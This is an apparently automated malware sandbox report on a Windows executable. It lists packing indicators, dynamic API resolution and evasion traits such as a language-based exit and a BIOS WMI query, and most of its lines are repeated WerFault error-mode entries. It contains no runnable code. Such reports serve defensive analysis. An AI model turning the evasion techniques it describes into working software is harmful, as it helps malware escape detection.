                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe Unpacked PE file: 0.2.YLshJwBcrT.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.dotej:W;.tls:W;.beciluy:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe Unpacked PE file: 0.2.YLshJwBcrT.exe.400000.1.unpack
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress 0_2_00419860
                    Source: YLshJwBcrT.exe Static PE information: section name: .dotej
                    Source: YLshJwBcrT.exe Static PE information: section name: .beciluy
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe Code function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe Code function: 0_2_0040020D pushfd ; iretd 0_2_00400211
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe Code function: 0_2_0085F102 push eax; ret 0_2_0085F120
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe Code function: 0_2_0085F111 push eax; ret 0_2_0085F120
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe Code function: 0_2_0085C133 push 7DD07DC0h; iretd 0_2_0085C144
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe Code function: 0_2_0085B62D pushfd ; iretd 0_2_0085B630
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe Code function: 0_2_022FB29C push ecx; ret 0_2_022FB2AF
                    Source: YLshJwBcrT.exe Static PE information: section name: .text entropy: 7.872518755623235
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress 0_2_00419860
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-26347)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Evaded block: after key decision (graph_0-27508)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; API coverage: 6.5 %
                    Source: C:\Windows\SysWOW64\WerFault.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exe; Code function 0_2_0040E430: FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
